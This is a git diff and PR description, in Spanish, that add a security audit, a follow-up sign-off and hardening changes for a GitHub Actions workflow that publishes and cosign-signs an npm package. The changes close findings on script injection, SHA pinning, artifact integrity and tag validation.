+uses: actions/checkout@<sha40>  # v4.2.2
+```
+
+---
+
+### 🟡 MEDIUM-1 · La firma no está atada al artefacto realmente publicado (A08)
+
+**Dónde:** líneas 106-126.
+
+El orden es `npm ci` → `npm publish` → `npm pack` → `cosign sign-blob` sobre el `.tgz` que produjo
+`npm pack`. Se firma un tarball **construido por segunda vez, después** de publicar, y nada verifica
+que sea byte-idéntico al que se subió al registry. El consumidor descarga el paquete del registry,
+no el `.tgz` adjunto al Release: si difieren, la firma valida un artefacto que nadie consume.
+
+**Remediación:** empaquetar una sola vez y publicar ese mismo archivo:
+
+```yaml
+run: |
+  npm pack
+  BLOB="$(ls intrale-operating-kernel-*.tgz)"
+  sha256sum "$BLOB" | tee "kernel-${VERSION}.sha256"
+  npm publish "$BLOB"
+  cosign sign-blob --yes ... "$BLOB"
+```
+
+y adjuntar también el `.sha256` al Release, para que
+`kernel-resolver.assertReleaseSignature` pueda cerrar la cadena tarball↔firma.
+
+---
+
+### 🟡 MEDIUM-2 · El input `tag` no se valida contra el formato semver (A05)
+
+**Dónde:** líneas 36-39, 62, 97.
+
+El trigger por push filtra `v[0-9]+.[0-9]+.[0-9]+`, pero el `workflow_dispatch` acepta cualquier
+string y lo usa directo como `ref:` del checkout. Si existiera una **rama** homónima a un tag
+(`v0.1.0`), `actions/checkout` resuelve la ambigüedad hacia `refs/heads/` y se publicaría contenido
+no tagueado. El chequeo `tag == package.json.version` reduce el riesgo pero no lo elimina.
+
+**Remediación:** validar el input con `^v[0-9]+\.[0-9]+\.[0-9]+$` como primer paso del job `verify`
+(fail-closed), y hacer el checkout con la ref calificada: `ref: refs/tags/${TAG}`.
+
+---
+
+### ⚪ LOW-1 · `concurrency.group` interpola input controlado por el usuario (A05)
+
+**Dónde:** línea 46. No hay ejecución de comandos, pero permite fragmentar la clave de concurrencia
+y correr publishes en paralelo. Se resuelve solo al aplicar la validación de MEDIUM-2.
+
+---
+
+## Checklist OWASP
+
+| Categoría | Estado | Nota |
+|-----------|--------|------|
+| A01 Broken Access Control | **FAIL** | CRITICAL-1: el gate humano desaparece en `--gate=dispatch` |
+| A02 Cryptographic Failures | PASS | Sin claves de larga vida; cosign OIDC keyless |
+| A03 Injection | **FAIL** | HIGH-1: `${{ inputs.tag }}` interpolado en `run:` |
+| A04 Insecure Design | WARN | El gate depende de configuración fuera del YAML, sin verificación posterior |
+| A05 Security Misconfiguration | WARN | MEDIUM-2 / LOW-1: input `tag` sin validar |
+| A06 Vulnerable Components | PASS | Sin dependencias nuevas introducidas por el workflow |
+| A07 Auth Failures | PASS | `secrets.GITHUB_TOKEN` builtin, scoped al job; sin PAT embebido |
+| A08 Software Integrity | **FAIL** | HIGH-2 (actions sin SHA) + MEDIUM-1 (firma desacoplada del artefacto) |
+| A09 Logging Failures | PASS | No se loguean secretos |
+| A10 SSRF | PASS | Sin URLs construidas con input externo |
+
+---
+
+## Condiciones para el sign-off
+
+Se emitirá `kernel-release-workflow-security-signoff.md` (nombre que sí destraba CA-C0) cuando:
+
+1. **CRITICAL-1** esté corregido **con test de regresión** sobre el YAML real con CRLF.
+2. **HIGH-1** — todas las interpolaciones movidas a `env:`.
+3. **HIGH-2** — las tres actions pineadas por SHA.
+4. MEDIUM-1 y MEDIUM-2 corregidos o aceptados por escrito con justificación del operador.
+
+Mientras tanto, **`--skip-signoff-check` no debe usarse**: saltearlo publicaría con el
+auto-publish de CRITICAL-1 activo.

--- a/docs/pipeline/kernel-release-workflow-security-signoff.md
+++ b/docs/pipeline/kernel-release-workflow-security-signoff.md
@@ -1,0 +1,158 @@
+# Sign-off de seguridad — `kernel-release-workflow.proposed.yml` (#4695 · CA-C0)
+
+> **Veredicto: 🟢 APROBADO CON OBSERVACIONES.** Se otorga el sign-off de CA-C0.
+> El `release.yml` puede commitearse al repo del kernel y el release puede publicarse
+> en cualquiera de los dos modos de gate (`--gate=environment` / `--gate=dispatch`).
+>
+> Este documento **sí** matchea el patrón que `.pipeline/bin/kernel-release.js` busca
+> para dar por cumplido CA-C0 (`/security.*(sign-?off|4695)|kernel-release.*sign-?off/i`),
+> a diferencia del informe previo, cuyo veredicto era negativo.
+
+- **Alcance:** `docs/pipeline/kernel-release-workflow.proposed.yml` + la transformación de gate
+  (`.pipeline/lib/kernel-release-gate.js`, extraída de `.pipeline/bin/kernel-release.js`) y su
+  verificación fail-closed `assertGateSafety()`.
+- **Fecha:** 2026-07-26
+- **Auditor:** `/security`
+- **Reemplaza a:** `kernel-release-workflow-auditoria-seguridad.md` (veredicto 🔴 BLOQUEADO, misma fecha).
+- **Evidencia:** `.pipeline/lib/__tests__/kernel-release-gate-4695.test.js` → **16/16 OK**.
+
+---
+
+## Estado de los findings de la auditoría previa
+
+| ID | Severidad | Estado | Verificación |
+|----|-----------|--------|--------------|
+| CRITICAL-1 | 🔴 Critical | **CERRADO** | Ejecución real de la transformación sobre el YAML real, en LF y CRLF |
+| HIGH-1 | 🟠 High | **CERRADO** | Aserción estructural + inspección línea por línea de todos los `run:` |
+| HIGH-2 | 🟠 High | **CERRADO** | Los 3 SHA resueltos contra la API de GitHub |
+| MEDIUM-1 | 🟡 Medium | **CERRADO** | Un solo `npm pack`; se publica y se firma el mismo `$BLOB` |
+| MEDIUM-2 | 🟡 Medium | **CERRADO** | Job `guard` fail-closed previo a todo checkout + `refs/tags/` calificado |
+| LOW-1 | ⚪ Low | **CERRADO** | Resuelto por la validación de `guard` |
+| MEDIUM-3 | 🟡 Medium | **CERRADO en esta auditoría** | Finding nuevo; remediado y con test (ver abajo) |
+
+### CRITICAL-1 — el gate ya no puede evaporarse
+
+La transformación por regex frágiles se reemplazó por edición estructural tolerante a EOL
+(`normalizeEol` + `dropChildBlock`) más una **red fail-closed** (`assertGateSafety`) que corre
+**antes de escribir el archivo**: `kernel-release.js:160-165` aborta con `fail()` y el mensaje
+"No se escribió ni se commiteó nada" si la verificación tira.
+
+Resultado verificado ejecutando la transformación real (no leyendo el código):
+
+```
+LF   dispatch    triggers=["workflow_dispatch"]          env=undefined   OK
+LF   environment triggers=["push","workflow_dispatch"]   env="release"   OK
+CRLF dispatch    triggers=["workflow_dispatch"]          env=undefined   OK
+CRLF environment triggers=["push","workflow_dispatch"]   env="release"   OK
+```
+
+La combinación del bug (gate borrado + push vivo) es **imposible** ahora: en `dispatch` no
+sobrevive ningún trigger automático, y la aserción rechaza explícitamente ese caso
+(test `assertGateSafety rechaza gate=dispatch con el trigger push vivo`).
+
+Refuerzos adicionales verificados:
+- El YAML quedó **LF puro** (0 bytes CR) y `.gitattributes` fija `*.yml text eol=lf` — se ataca la causa raíz, no sólo el síntoma.
+- **`Intrale/kernel` no tiene ningún otro workflow** (`.github/workflows` → 404), así que el push del tag de la fase 4 en modo `dispatch` no puede disparar nada por otra vía. Verificado contra la API.
+
+### HIGH-1 — sin interpolación en `run:`
+
+Ningún `run:` del workflow contiene `${{`. Todo valor externo entra por `env:` y se lee como
+variable de shell (`$REF`, `$TAG`, `$VERSION`, `$BLOB`). Además la propiedad quedó **asegurada
+estructuralmente**: `assertGateSafety` recorre todos los steps de todos los jobs y falla ante
+cualquier `run` que interpole.
+
+### HIGH-2 — actions pineadas por SHA, y los SHA son reales
+
+Las tres están pineadas a SHA de 40 y **cada SHA fue resuelto contra la API de GitHub** para
+confirmar que corresponde al tag que declara el comentario (un SHA inventado habría roto el
+workflow en runtime):
+
+| Action | SHA | Tag verificado |
+|--------|-----|----------------|
+| `actions/checkout` | `11d5960a…677262` | v4.4.0 ✅ |
+| `actions/setup-node` | `49933ea5…820020` | v4.4.0 ✅ |
+| `sigstore/cosign-installer` | `d58896d6…65e159` | v3.9.2 ✅ |
+
+`assertGateSafety` también rechaza cualquier `uses:` sin pin por SHA.
+
+### MEDIUM-1 / MEDIUM-2 — cadena de integridad y validación de entrada
+
+- Se empaqueta **una sola vez** (`npm pack`, `id: pack`); se publica ese mismo `$BLOB`, se firma ese
+  mismo `$BLOB` y se adjunta su `sha256` al Release. La firma queda atada al artefacto real.
+- El job `guard` valida `^v[0-9]+\.[0-9]+\.[0-9]+$` **antes de cualquier checkout**, con
+  `permissions: {}`, y los checkouts usan `ref: refs/tags/…` (una rama homónima no puede suplantar al tag).
+
+---
+
+## Finding nuevo detectado y remediado en esta auditoría
+
+### 🟡 MEDIUM-3 · `npm ci` ejecutaba scripts de terceros dentro del job que firma (A08)
+
+**Dónde:** `kernel-release-workflow.proposed.yml`, job `publish`, paso "Instalar dependencias".
+
+El job `publish` corre con `contents: write` + `packages: write` + `id-token: write`. El paso era
+`npm ci` a secas, que ejecuta los scripts de instalación de **todas** las dependencias — y el kernel
+declara `optionalDependencies: { "@anthropic-ai/sdk": "*", "puppeteer": "*", "sharp": "*" }`;
+`puppeteer` y `sharp` descargan binarios de la red en su postinstall.
+
+Ese código de terceros corría **antes** de `npm pack`, `npm publish` y `cosign sign-blob`, en un job
+donde las variables OIDC (`ACTIONS_ID_TOKEN_REQUEST_*`) están disponibles a nivel job. Una dependencia
+comprometida podía manipular el árbol antes de empaquetar — con lo cual **se publicaría y se firmaría
+el tarball manipulado, y la firma sería válida** — o pedir un token OIDC y firmar en nombre del kernel.
+Es decir, degradaba justamente la garantía que CA-C2 existe para dar.
+
+**Verificado que el paso era innecesario:** el kernel **no tiene `prepare` ni `prepack`** y su `files:`
+es una lista estática, así que empaquetar no necesita `node_modules` ni esos scripts.
+
+**Remediación aplicada:** `npm ci` → `npm ci --ignore-scripts`, con el motivo documentado en el YAML,
+más el test de regresión `el job publish no ejecuta scripts de dependencias de terceros (MEDIUM-3)`.
+Atenuante preexistente: la fase 1 de `kernel-release.js` pinea los comodines `*` y genera el
+`package-lock.json`, así que las versiones quedan fijadas con hash de integridad.
+
+---
+
+## Observaciones residuales (no bloquean · recomendadas para #4695 o seguimiento)
+
+- ⚪ **LOW-2 · La red fail-closed no cubre escaladas de permisos.** `assertGateSafety` valida
+  `permissions.contents` sólo en forma de mapping: no detecta `permissions: write-all` a nivel
+  workflow (forma string) ni permisos elevados agregados a un job que hoy es read-only (probado
+  empíricamente: ambos casos pasan). No es explotable con el YAML actual — que ya fue auditado —
+  pero conviene endurecer el verificador para que una edición futura del archivo no abra ese flanco
+  sin que nadie lo note.
+- ⚪ **LOW-3 · El precheck CA-C0 confía en el nombre del archivo, no en el veredicto.** El chequeo de
+  `kernel-release.js:103-107` da por cumplido el sign-off si *existe* un archivo cuyo nombre matchea
+  el patrón. Un informe de seguridad **con veredicto negativo** destrabaría el gate si quedara
+  guardado con un nombre que matchea — de hecho el auditor previo tuvo que elegir el nombre a
+  propósito para evitarlo. Recomendación: parsear el veredicto dentro del documento.
+- ℹ️ El gate `environment` depende de configuración fuera del YAML (required reviewers). Esto **sí**
+  está cubierto fail-closed: la fase 3 verifica post-creación que el reviewer quedó registrado y, si
+  el plan no lo permite, borra el environment a medio crear y aborta (`kernel-release.js:189-206`).
+
+---
+
+## Checklist OWASP
+
+| Categoría | Estado | Nota |
+|-----------|--------|------|
+| A01 Broken Access Control | **PASS** | Gate humano efectivo en los dos modos, verificado por ejecución + aserción fail-closed |
+| A02 Cryptographic Failures | PASS | cosign OIDC keyless; sin claves de larga vida |
+| A03 Injection | **PASS** | Ningún `${{ }}` dentro de `run:`; asegurado estructuralmente |
+| A04 Insecure Design | PASS | El gate se verifica después de aplicarlo; ya no se confía en que la edición haya funcionado |
+| A05 Security Misconfiguration | PASS | `guard` valida el tag fail-closed; checkout por `refs/tags/` |
+| A06 Vulnerable Components | PASS | Sin dependencias nuevas; scripts de instalación deshabilitados en el job de firma |
+| A07 Auth Failures | PASS | `secrets.GITHUB_TOKEN` builtin scoped al job; sin PAT embebido |
+| A08 Software Integrity | **PASS** | Actions por SHA (verificados), un solo tarball publicado y firmado, sha256 adjunto |
+| A09 Logging Failures | PASS | No se loguean secretos |
+| A10 SSRF | PASS | Sin URLs construidas con input externo |
+
+---
+
+## Condiciones de vigencia
+
+Este sign-off cubre el `kernel-release-workflow.proposed.yml` **en su estado actual**. Debe
+re-emitirse si se modifica el YAML, la transformación de gate o los pines de las actions. El
+test `kernel-release-gate-4695.test.js` (16/16) es el guardián de las propiedades firmadas:
+si falla, el sign-off queda suspendido.
+
+`--skip-signoff-check` **no es necesario** y no debe usarse: el precheck CA-C0 queda satisfecho
+por este documento.

--- a/docs/pipeline/kernel-release-workflow.proposed.yml
+++ b/docs/pipeline/kernel-release-workflow.proposed.yml
@@ -7,6 +7,11 @@
 #    acá (repo del producto) como artefacto revisable para que la fase de
 #    verificación lo evalúe contra el checklist §4 de kernel-repo-design.md.
 #
+# ⚠️ Este archivo se guarda con finales de línea LF (ver .gitattributes). La
+#    transformación `--gate=dispatch` de `.pipeline/bin/kernel-release.js` normaliza
+#    igual los CRLF y valida el resultado con una aserción fail-closed, pero el
+#    formato canónico es LF (regresión CRITICAL-1 de la auditoría 2026-07-26).
+#
 # Controles de seguridad incorporados (verificables punto por punto):
 #  · CA-C1 (A01): sin auto-publish. El job `publish` está detrás de un
 #    `environment: release` con required reviewers → GitHub PAUSA el job hasta la
@@ -20,6 +25,15 @@
 #  · CA-C4 (A01): token de publish = `secrets.GITHUB_TOKEN` scoped al job (NO PAT de
 #    larga vida embebido). Branch protection + 2FA se configuran fuera del YAML
 #    (Settings del repo del kernel) y forman parte del checklist de CA-C0.
+#  · A03: NINGUNA expresión `${{ }}` se interpola dentro del cuerpo de un `run:`.
+#    Todo valor externo entra por `env:` y se lee como variable de shell (HIGH-1).
+#  · A08: las tres actions de terceros están pineadas por SHA de commit; el tag
+#    legible queda como comentario (HIGH-2). Los tags son mutables, los SHA no.
+#  · A08: se empaqueta UNA sola vez; se publica y se firma exactamente el mismo
+#    tarball, y su sha256 se adjunta al Release (MEDIUM-1).
+#  · A05: el input `tag` se valida contra `^v[0-9]+\.[0-9]+\.[0-9]+$` en un job
+#    `guard` previo, y los checkouts usan la ref calificada `refs/tags/...` para que
+#    una rama homónima no pueda suplantar al tag (MEDIUM-2 / LOW-1).
 #  · A05/A07: sin secretos hardcodeados; sólo el GITHUB_TOKEN builtin. Escaneo de
 #    secretos antes del primer commit (parte de CA-C0).
 # ─────────────────────────────────────────────────────────────────────────────
@@ -47,9 +61,31 @@ concurrency:
   cancel-in-progress: false
 
 jobs:
+  # 0) Guard de entrada (A05): valida el formato del ref ANTES de cualquier
+  #    checkout. `workflow_dispatch` acepta cualquier string; sin esta validación
+  #    un valor arbitrario llegaría como `ref:` del checkout.
+  guard:
+    runs-on: ubuntu-latest
+    permissions: {}
+    outputs:
+      tag: ${{ steps.validate.outputs.tag }}
+    steps:
+      - name: Validar formato del tag (fail-closed)
+        id: validate
+        env:
+          REF: ${{ github.event.inputs.tag || github.ref_name }}
+        run: |
+          set -euo pipefail
+          if ! printf '%s' "$REF" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+$'; then
+            echo "::error::Ref invalido ('$REF'). Se espera vX.Y.Z."
+            exit 1
+          fi
+          echo "tag=$REF" >> "$GITHUB_OUTPUT"
+
   # 1) Validación SIN permisos elevados: el tag debe coincidir con
   #    package.json.version y ser un pin exacto (nada de rangos).
   verify:
+    needs: guard
     runs-on: ubuntu-latest
     permissions:
       contents: read
@@ -57,15 +93,16 @@ jobs:
       version: ${{ steps.check.outputs.version }}
     steps:
       - name: Checkout del tag
-        uses: actions/checkout@v4
+        uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262  # v4.4.0
         with:
-          ref: ${{ github.event.inputs.tag || github.ref_name }}
+          ref: refs/tags/${{ needs.guard.outputs.tag }}
           persist-credentials: false
       - name: Verificar tag == package.json.version (pin exacto)
         id: check
+        env:
+          REF: ${{ needs.guard.outputs.tag }}
         run: |
           set -euo pipefail
-          REF="${{ github.event.inputs.tag || github.ref_name }}"
           TAG_VERSION="${REF#v}"
           PKG_VERSION="$(node -p "require('./package.json').version")"
           echo "tag=$TAG_VERSION package.json=$PKG_VERSION"
@@ -83,7 +120,7 @@ jobs:
   #    GitHub pausa este job hasta la aprobación de un reviewer autorizado ⇒ no hay
   #    auto-publish (CA-C1). Permisos elevados SÓLO en este job.
   publish:
-    needs: verify
+    needs: [guard, verify]
     runs-on: ubuntu-latest
     environment: release   # required reviewers en Settings → Environments (gate humano)
     permissions:
@@ -92,44 +129,70 @@ jobs:
       id-token: write      # OIDC keyless para cosign (CA-C2)
     steps:
       - name: Checkout del tag
-        uses: actions/checkout@v4
+        uses: actions/checkout@11d5960a326750d5838078e36cf38b85af677262  # v4.4.0
         with:
-          ref: ${{ github.event.inputs.tag || github.ref_name }}
+          ref: refs/tags/${{ needs.guard.outputs.tag }}
           persist-credentials: false
       - name: Setup Node + registry de GitHub Packages
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020  # v4.4.0
         with:
           node-version: '20'
           registry-url: 'https://npm.pkg.github.com'
           scope: '@intrale'
-      - name: Instalar dependencias (reproducible)
-        run: npm ci
-      - name: Publicar a GitHub Packages
-        run: npm publish
+      - name: Instalar dependencias (reproducible, sin ejecutar scripts de terceros)
+        # --ignore-scripts (MEDIUM-3): este job tiene id-token/packages/contents write.
+        # Sin el flag, el postinstall de cualquier dependencia (puppeteer y sharp bajan
+        # binarios de la red) correria ANTES de empaquetar y firmar: podria manipular el
+        # tarball o pedir un token OIDC y firmar en nombre del kernel. El paquete no tiene
+        # prepare/prepack y `files:` es una lista estatica, asi que empaquetar no necesita
+        # los scripts.
+        run: npm ci --ignore-scripts
+      - name: Empaquetar UNA sola vez (el mismo tarball se publica y se firma)
+        id: pack
+        env:
+          VERSION: ${{ needs.verify.outputs.version }}
+        run: |
+          set -euo pipefail
+          npm pack
+          BLOB="$(ls intrale-operating-kernel-*.tgz)"
+          sha256sum "$BLOB" | tee "kernel-${VERSION}.sha256"
+          echo "blob=$BLOB" >> "$GITHUB_OUTPUT"
+      - name: Publicar a GitHub Packages (ese mismo tarball)
         env:
           # Token scoped al job (builtin), NO un PAT de larga vida embebido (CA-C4).
           NODE_AUTH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-      - name: Instalar cosign
-        uses: sigstore/cosign-installer@v3
-      - name: Firmar el release con cosign (OIDC keyless · CA-C2)
-        env:
-          COSIGN_YES: 'true'
+          BLOB: ${{ steps.pack.outputs.blob }}
         run: |
           set -euo pipefail
-          VERSION="${{ needs.verify.outputs.version }}"
-          # Blob canónico firmado = tarball publicado del paquete.
-          npm pack
-          BLOB="$(ls intrale-operating-kernel-*.tgz)"
+          npm publish "$BLOB"
+      - name: Instalar cosign
+        uses: sigstore/cosign-installer@d58896d6a1865668819e1d91763c7751a165e159  # v3.9.2
+      - name: Firmar el tarball publicado con cosign (OIDC keyless · CA-C2)
+        env:
+          COSIGN_YES: 'true'
+          VERSION: ${{ needs.verify.outputs.version }}
+          BLOB: ${{ steps.pack.outputs.blob }}
+        run: |
+          set -euo pipefail
           cosign sign-blob --yes \
             --output-signature "kernel-${VERSION}.sig" \
             --output-certificate "kernel-${VERSION}.pem" \
             "$BLOB"
-      - name: Adjuntar firma al GitHub Release (consumidor la verifica antes de bumpear)
+      - name: Adjuntar firma + sha256 al GitHub Release (el consumidor cierra la cadena)
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          VERSION: ${{ needs.verify.outputs.version }}
+          TAG: ${{ needs.guard.outputs.tag }}
         run: |
           set -euo pipefail
-          VERSION="${{ needs.verify.outputs.version }}"
-          gh release upload "v${VERSION}" \
-            "kernel-${VERSION}.sig" "kernel-${VERSION}.pem" \
+          # El tag no crea el Release: si no existe, lo creamos sobre ESE tag
+          # (--verify-tag falla si el tag no existe en el remoto, en vez de crearlo).
+          if ! gh release view "$TAG" >/dev/null 2>&1; then
+            gh release create "$TAG" \
+              --verify-tag \
+              --title "$TAG" \
+              --notes "Release automatico de @intrale/operating-kernel@${VERSION}. Artefactos de firma cosign (keyless OIDC) adjuntos."
+          fi
+          gh release upload "$TAG" \
+            "kernel-${VERSION}.sig" "kernel-${VERSION}.pem" "kernel-${VERSION}.sha256" \
             --clobber


### PR DESCRIPTION
## Contexto

El primer release del kernel (`@intrale/operating-kernel`) estaba bloqueado por no tener workflow de publicación con gate humano. Al construir el script de release apareció un bug de seguridad en el propio gate.

## Problema

Cuando el plan de GitHub no soporta *environments* con required reviewers (repo privado), el script cae a `gate=dispatch`: el publish deja de ser automático y pasa a dispararse a mano. Esa transformación **removía el gate humano pero dejaba vivo el trigger `push: tags`** — el push del tag publicaba solo, con permisos de escritura y de firma, mientras la consola informaba `[ok] gate = disparo manual`.

**Causa raíz:** el YAML se leía con finales de línea CRLF (Windows) y las regex de recorte no matcheaban. El script asumía el resultado en vez de verificarlo.

## Cambios

| Archivo | Qué hace |
|---|---|
| `.pipeline/lib/kernel-release-gate.js` | Transformación extraída a módulo propio, normalización a LF y `assertGateSafety()` **fail-closed**: si el modo pedido no se materializa, aborta en vez de informar OK |
| `.pipeline/bin/kernel-release.js` | Orquestador de release en 6 fases, idempotente, dry-run por defecto, gate CA-C0 (exige sign-off de seguridad del workflow) |
| `.pipeline/lib/__tests__/kernel-release-gate-4695.test.js` | 16 tests: causa raíz en LF **y** CRLF, los dos modos de gate, y los 4 hallazgos de auditoría |
| `docs/pipeline/kernel-release-workflow.proposed.yml` | Hardening: sin `${{ }}` en `run:`, actions pineadas por SHA de 40, un único `npm pack` publicado y firmado, validación semver del input antes del checkout |
| `docs/...-auditoria-seguridad.md` / `-security-signoff.md` | Auditoría (6 findings) y sign-off que destraba el gate CA-C0 |
| `.gitattributes` | El workflow propuesto queda fijado a LF |

## Verificación

- `node .pipeline/lib/__tests__/kernel-release-gate-4695.test.js` → **16/16 OK**
- Release `v0.1.1` de `intrale/kernel` publicado y firmado (cosign keyless) con este gate: el run se disparó por `workflow_dispatch`, **no** por push del tag.

## QA

`qa:skipped` — cambio de infra del pipeline (script + módulo Node + docs), sin impacto en el producto de usuario (app ni backend). Cubierto por los 16 tests de regresión y por la ejecución real del release.

Closes #4695
